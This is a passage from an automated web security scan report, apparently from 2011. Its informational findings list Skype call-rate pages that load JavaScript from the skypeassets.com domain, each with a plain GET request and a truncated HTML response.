Path:   /intl/en-us/prices/call-rates/cheap-calls-to-ireland

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-ireland HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:24 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.729. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-israel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-israel

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-israel HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:24 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.730. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-italy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-italy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-italy HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:26 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.731. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-jamaica  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-jamaica

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-jamaica HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:58 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.732. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-japan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-japan

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-japan HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:58 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.733. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-jordan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-jordan

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-jordan HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:59 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.734. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kazakhstan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-kazakhstan

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-kazakhstan HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:59 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.735. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kenya  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-kenya

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-kenya HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:00 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.736. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kiribati  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-kiribati

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-kiribati HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:00 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.737. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kuwait  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-kuwait

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-kuwait HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:00 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.738. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kyrgyzstan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-kyrgyzstan

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-kyrgyzstan HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:00 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.739. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-laos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-laos

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-laos HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:01 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.740. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-latvia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-latvia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-latvia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:02 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.741. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-lebanon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-lebanon

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-lebanon HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:03 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.742. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-lesotho  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-lesotho

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-lesotho HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:03 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.743. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-liberia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-liberia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-liberia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:03 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
